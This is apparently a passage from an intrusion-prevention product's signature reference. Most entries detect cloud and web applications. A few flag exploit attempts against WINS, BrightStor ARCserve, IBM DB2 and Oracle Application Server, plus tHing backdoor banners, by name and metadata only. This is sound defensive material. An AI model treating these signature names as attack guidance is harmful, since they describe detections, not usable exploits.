Last changed: sgpkg-ips-371-4219
Vulnerability: WINS-Replication-Packet-System-Comromise
Description:
Back to top

WINS_Replication-Packet-System-Compromise

About this situation: WINS replication packet association context vulnerability
Context: WINS TCP Client Stream
Severity: 10
Tags: Windows NT, Windows 2000, Windows 2003, x86, MS2004-12, CVE2004, Windows NT not specific, Windows 2000 not specific, Windows 2003 not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-344-4219
Vulnerability: WINS-Replication-Packet-System-Comromise
Description:
Back to top

WINS_WINS-Computer-Name-Validation-Buffer-Overflow

About this situation: WINS name value buffer overflow vulnerability
Context: WINS TCP Client Stream
Severity: 10
Tags: Windows NT, Windows 2000, Windows 2003, x86, MS2004-12, CVE2004, Windows NT not specific, Windows 2000 not specific, Windows 2003 not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-343-4219
Vulnerability: WINS-Computer-Name-Validation-Buffer-Overflow
Description:
Back to top

Wintac

About this situation: Application Wintac detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wintac Software is a Selling Field Service Software for small to medium sized field service companies.
Back to top

WinWeb

About this situation: Application WinWeb detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WinWeb integrated business cloud computing. Creating competitive advantages and profitable businesses.
Back to top

Wireclub

About this situation: Wireclub usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Wiredrive

About this situation: Wiredrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This service allows businesses to send work to customers for review and approval or sales presentations.
Back to top

WiredTree

About this situation: Application WiredTree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WiredTree offers Fully Managed VPS and Dedicated Server Hosting designed to meet business needs. 24 hour expert phone and help desk support on all plans.
Back to top

Wireless Background Task

About this situation: Endpoint Context Agent based Wireless Background Task detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: Microsoft Windows Wireless Backgound Task endpoint application was detected. Wireless Background Task monitors and configures wireless network connections in Microsoft Windows.
Back to top

Wireshark

About this situation: Endpoint Context Agent based Wireshark detection
Context: EI Correlation
Severity: 1
Tags: Monitoring, Endpoint
First detected in: sgpkg-ips-991-5242
Last changed: sgpkg-ips-991-5242
Description: Wireshark endpoint application has been detected. Wireshark is a network traffic capturing and analysis tool.
Back to top

Wishpond

About this situation: Application Wishpond detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wishpond is a marketing suite to create landing pages, forms, website popups, contests and promotions, ads and email campaigns.
Back to top

WishSimple

About this situation: Application WishSimple detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WishSimple - social gifting service
Back to top

WISP

About this situation: Application WISP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WISP is a mobile employee handbook. It is an solution for employers for keeping in touch with employees.
Back to top

Wistia

About this situation: Wistia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to configure how videos are viewed, embedded, and provides in-depth analytics. Source: Wikipedia
Back to top

Withings

About this situation: Application Withings detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Withings is a company that creates smart products and apps to help people take care of their health.
Back to top

Wix

About this situation: Application Wix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1723-5242
Description: Wix.com is a cloud-based web development platform that allows users to create HTML5 web sites and mobile sites through the use of their online drag and drop tools.
Back to top

Wixi

About this situation: wixi usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload and download files over the web
Back to top

Wizehive

About this situation: WizeHive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: WizeHive is a web based submission management system specializing in publishers contests, grants, fellowships and scholarships.
Back to top

WizIQ

About this situation: Application WizIQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WizIQ is a mobile-ready Learning Delivery Platform to deliver live and self-paced online courses.
Back to top

WMIC

About this situation: Endpoint Context Agent based Windows Management Instrumentation Command-Line Utility detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Description: A network connection launched by Windows Management Instrumentation Command-Line Utility was detected. Network connections produced my wmic.exe may indicate that the system has been compromised.
Back to top

WmiPrvSE.exe

About this situation: Endpoint Context Agent based Wmiprvse.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: A network connection launched by the Windows system process Wmiprvse.exe was detected. Wmiprvse.exe provides management information and control in enterprise environments.
Back to top

WO-Streaming

About this situation: Application WO-Streaming detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WO Streaming is platform for managing and monetizing digital audio streams.
Back to top

Wolfram-Alpha

About this situation: Application Wolfram-Alpha detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wolfram Alpha is a computational knowledge engine or answer engine developed by Wolfram Research. It is an online service that answers factual queries directly by computing the answer from externally sourced curated data, rather than providing a list of documents or web pages that might contain the answer as a search engine might.
Back to top

Wolt

About this situation: Wolt usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1764-5242
Description: Wolt is an online food delivery service.
Back to top

Wondershare

About this situation: Application Wondershare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wondershare offers Video Software, PDF Tools, PC Utilities for Mac and Win users to convert, edit videos, photos or PDF files, make photo slideshow etc.
Back to top

Woodpecker-it

About this situation: Application Woodpecker-it detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Woodpecker IT is a flexible web-based bug tracking and change request system, easy to use, flexible and highly configurable.
Back to top

Woofiles

About this situation: Woofiles usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-628-5211
Description: Woofiles is a file storage service where a user can upload all his files anonymously and easily share the files with others.
Back to top

Woome

About this situation: WooMe usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Woopra

About this situation: Woopra usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Woopra delivers live, granular behavioral data for individual website visitors and customers.
Back to top

WooRank

About this situation: Application WooRank detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WooRank is Website Review and SEO Tool for internet marketing.
Back to top

Woot

About this situation: Woot usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Woot is an online store and community that focuses on selling discounted products.
Back to top

Wordfast-Anywhere

About this situation: Wordfast Anywhere usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows users to complete translations and access a public translation memory database. Source: Wikipedia
Back to top

Wordpress

About this situation: Wordpress.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-630-5211
Description: WordPress.com is a free blog hosting platform that provides a quick and easy way to get a blog online.
Back to top

Wordpress-CMS

About this situation: Wordpress usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-516-5211
Last changed: sgpkg-ips-939-5242
Description: Wordpress is a free content management system (CMS) that is based on PHP and MySQL. It is one of the most popoular blogging systems in use.
Back to top

WordStream

About this situation: Application WordStream detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WordStream is a provider of software and services that help marketers to driving traffic, leads and sales.
Back to top

Workable

About this situation: Application Workable detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Workable is a cloud-based solution that helps companies advertise jobs, screen candidates and accelerate their hiring process.
Back to top

Workamajig

About this situation: Application Workamajig detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Workamajig, formerly known as Creative Manager Pro, is a customizable, web-based project management software for creative groups, such as advertising agencies, design firms, in-house creative departments and public relations firms.
Back to top

Workboard

About this situation: Application Workboard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Workboard is a team collaboration and productivity app that helps managers communicate goals, set priorities and provide feedback to their teams.
Back to top

WorkBook

About this situation: Application WorkBook detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PErfect solution for multiple location and collaboration through integrated conversations. Ideal for project-driven organizations that require CRM, forecasting, project and resourc
Back to top

Workbooks-CRM

About this situation: Workbooks CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-636-5211
Description: This software allows users to manage customer information in one place, including sales order processing, contract management, and invoicing. Source: Wikipedia
Back to top

Workday

About this situation: workday usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: Workday is a leading provider of enterprise cloud applications for human resources and finance.
Back to top

Worketc

About this situation: WORKetc usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: WORKetc is a cloud-based platform for business management solutions for small to medium businesses through a SaaS application.The WORKetc application combines CRM, help desk, time sheet integration, billing and project management that can be accessed through a cloud platform.
Back to top

Workface-Chat

About this situation: Application Workface-Chat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Workface is a social selling platform. Workface chat enables customers to talk with agents at your company in real-time.
Back to top

Workflowmax

About this situation: WorkflowMax usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: WorkflowMax is an online Job Management Solution. The software provides a tool for small to medium sized, service focused companies to manage their jobs, projects, time, quotes and invoices in one streamlined, highly intuitive application.
Back to top

WorkFlowy

About this situation: Application WorkFlowy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WorkFlowy is an organizational tool that makes life easier. It can help you organize personal to-dos, collaborate on large team projects, take notes, write research papers, keep a journal, plan a wedding, and much more.
Back to top

Workforce-Guardian

About this situation: Application Workforce-Guardian detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Workforce Guardian is Australia's leading HR and employment relations service for employers.
Back to top

Workforce-Velocity

About this situation: Application Workforce-Velocity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Workforce-Velocity is a SaaS-based complete suite of products to manage time and attendance, workforce planning, labor cost control, scheduling, talent file management, automated bi-directional communication and performance management, quickly, strategically and from anywhere you place your computer.
Back to top

Workforcegrowth

About this situation: WorkforceGrowth usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: WorkforceGrowth is a culture management system to help companies keep employees happy. They help companies focus on top two employee motivators i.e Recognition and Growth. Their core market is SMEs and They help them provide complete social tools to manage their employees, conduct performance reviews, plan for their growth and most important of all keep them happy so they are more productive.
Back to top

Workfront

About this situation: Application Workfront detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Workfront is a software company that develops web-based work management and project management software that features enterprise work management, issue tracking, document management time tracking and portfolio management.
Back to top

WorkSafeOnline

About this situation: Application WorkSafeOnline detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WorkSafeOnline is a complete on-demand health, safety and environment
Back to top

Workshare

About this situation: Application Workshare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Workshare is a provider of secure enterprise file sharing and collaboration applications. Workshare allows individuals to easily create, share, and manage high-value content anywhere, on any device.
Back to top

Workspot

About this situation: Application Workspot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Workspot enables employees to access their business applications and data from a secure workspace on any device - iPhone, iPad, Android, Windows PC, and Macs.
Back to top

WorkTrail

About this situation: Application WorkTrail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WorkTrail is time tracking Optimised for users and teams who work on multiple tasks throughout the day and have to keep track of which projects have taken up their time.
Back to top

WorkXpress-Build-from-Scratch

About this situation: Application WorkXpress-Build-from-Scratch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The WorkXpress platform as a service (PaaS) empowers you to employ customized database business application software within your large or small business, create and manage your cloud and build a software based business.
Back to top

WorkZone

About this situation: Application WorkZone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WorkZone provides easy-to-use, web-based project management software and document sharing. Projects run more effectively, staying on time and on budget.
Back to top

World-Manager

About this situation: Application World-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The World Manager is online corporate communications platform internationally. World Manager is in the business of giving CEO's, Operations Managers, HR and Training Managers the ability to track every employee world-wide, by-the-minute.
Back to top

World-Web-Studio

About this situation: Application World-Web-Studio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: World Web Studio is a service interactive agency that provides advising brands to analyzing and providing integrated campaigns.
Back to top

WorldAPP

About this situation: Application WorldAPP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WorldAPP helps mid to large organizations improve how they collect, manage, and leverage data across the enterprise.
Back to top

Worldapp-Key-Survey

About this situation: WorldAPP Key Survey usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: WorldAPP Key Survey provides the most advanced business survey products on the market and then further support and enhance customer value through the best service in the entire industry.
Back to top

Worldpay

About this situation: Application Worldpay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Worldpay is a financial technology company, specializing in payment processing.
Back to top

Worldwinner

About this situation: WorldWinner usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Wormly

About this situation: Application Wormly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wormly monitors your website and server infrastructure to keep you online and performing fast.
Back to top

WOW Presents Plus

About this situation: WOW Presents Plus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Description: WOW Presents Plus is a subscription-based video streaming service. This application situation is meant for blocking the application.
Back to top

Wowhead

About this situation: Wowhead usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

WP-EasyCart

About this situation: Application WP-EasyCart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WP EasyCart is a shopping cart plugin designed to integrate into WordPress website.
Back to top

WPEngine

About this situation: WPEngine usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-630-5211
Description: WPEngine is a commercial WordPress hosting service.
Back to top

Wrike

About this situation: Wrike usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This application allows users to control projects, maintain deadlines and schedules, prioritize tasks, and collaborate with multiple teams. Source: Wikipedia
Back to top

Wufoo

About this situation: Wufoo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This application allows users to create forms that include contact forms, online payments, online surveys, and event registrations. Source: Wikipedia
Back to top

Wunderlist

About this situation: Application Wunderlist detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wunderlist is a cloud-based task management application. It allows users to manage their tasks from a smartphone, tablet, computer and smartwatch.
Back to top

WWD

About this situation: Application WWD detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WWD is the authority for news, business coverage and trends in of fashion, beauty and retail.
Back to top

Wwitv.com

About this situation: wwiTV.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This website enables users to watch videos and television channels over the Internet.
Back to top

Wymsy

About this situation: Application Wymsy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wymsy is a website management system for small business and non profits to create and manage custom website.
Back to top

WYSIWYG-Web-Builder

About this situation: Application WYSIWYG-Web-Builder detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WYSIWYG Web Builder provides web design solutions for building web sites.
Back to top

X

About this situation: X (previously Twitter) usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1636-5242
Description: X (previously Twitter) is a free social networking and micro-blogging service.
Back to top

X-Font-Server

About this situation: X Font Server traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-595-5211
Description: X Font Server (xfs) is an X Window System font server which supplies fonts to X Window System display servers.
Back to top

X-VPN

About this situation: Endpoint Context Agent based X-VPN Connection
Context: EI Correlation
Severity: 1
Tags: Tunneling, Endpoint
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Description: X-VPN endpoint application has been detected. X-VPN is a free proxy-based tool for internet privacy and security that allows users to bypass firewalls and protect their identity online.
Back to top

X11

About this situation: X Window System X11 Protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Remote control, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: X Window System X11 Protocol usage.
Back to top

X11_CA-BrightStor-Arcserve-Backup-Universal-Agent-Buffer-Overflow

About this situation: Detects buffer overflow exploits against BrightStor ARCserve/Enterprise Backup
Context: X11 TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor, CVE2005, Any Operating System not specific, Computer Associates BrightStor not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-277-4219
Vulnerability: CA-BrightStor-Arcserve-Backup-Universal-Agent-Buffer-Overflow
Description:
Back to top

X11_CS-IBM-DB2-kuddb2-Remote-Denial-of-Service-Vulnerability

About this situation: An attempt to exploit an IBM DB2 kuddb2 Remote Denial of Service Vulnerability detected
Context: X11 TCP Client Stream
Severity: 2
Tags: Linux, Any Hardware, IBM DB2, CVE2010, Linux not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: IBM-DB2-kuddb2-Remote-Denial-of-Service-Vulnerability
Description:
Back to top

X11_CS-Oracle-Application-Server-10g-OPMN-Service-Format-String

About this situation: An attempt to exploit a vulnerability in Oracle Application Server detected
Context: X11 TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Server, CVE2009, Any Operating System not specific, Oracle Application Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Oracle-Application-Server-10g-OPMN-Service-Format-String-Vulnerability
Description:
Back to top

X11_Remote-XOpen

About this situation: X11 open request detected
Context: X11 TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic X server, CVE1999, Any Operating System not specific, Remote Control, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Insecure-X-Server-Allows-Sniffing
Description:
Back to top

X11_ThetHing-Backdoor-Banner

About this situation: The tHing backdoor banner
Context: X11 TCP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-The-Thing
Description:
Back to top

X11_ThetHing-Backdoor-Connected

About this situation: The tHing backdoor banner
Context: X11 TCP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-The-Thing
Description:
Back to top

Xactly-Incent

About this situation: Application Xactly-Incent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xactly Corporation is a provider of on-demand sales performance management. Xactlys solutions automate the process of aggregating data from disparate systems into a secure, hosted repository, and enable companies to leverage this business data, which is the lifeblood of sales performance management.
Back to top

XaitPorter

About this situation: Application XaitPorter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: XaitPorter is a collaborative document production solution that enables several contributors to work on the same document at the same time.
Back to top

Xamarin

About this situation: Application Xamarin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xamarin cross-platform development software that allow Build and design a mobile app.
Back to top

Xanga

About this situation: Xanga usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Xanga usage has been detected.
Back to top

xAssets

About this situation: Application xAssets detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: xAssets makes optimization of asset processes, asset performance, asset financials, best practices, compliance and business intelligence possible with affordable implementation times.
Back to top

Xat

About this situation: xat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

XC-E-Commerce-Platform

About this situation: Application XC-E-Commerce-Platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: XC E-Commerce Platform provides scalable B2B E Commerce solutions at an affordable budget for manufacturers and distributors of IT and office products.
Back to top

xCALLY

About this situation: Application xCALLY detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: xCALLY provides communication components for multi channel and social customer care apps.
Back to top

xcAuction

About this situation: Application xcAuction detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: xcAuction provides an ASP auction software.
Back to top

Xcentric

About this situation: Application Xcentric detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xcentric - IT consulting firm specializing in all things technology for CPA firms.
Back to top

XCloud

About this situation: Application XCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: XCloud provides cloud computing and storage service.
Back to top

Xeesm

About this situation: Application Xeesm detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xeesm is a social address book - allowing you to keep the social sites of all your business and personal friends. Xeesm also helps you track who you visited, how often you visited your contacts, where and when the last visit was.
Back to top

Xendo

About this situation: Application Xendo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xendo provide search system cross online applications. One search across multiple accounts: Gmail, Dropbox, Slack, Evernote, salesforce, and more.
Back to top

Xero

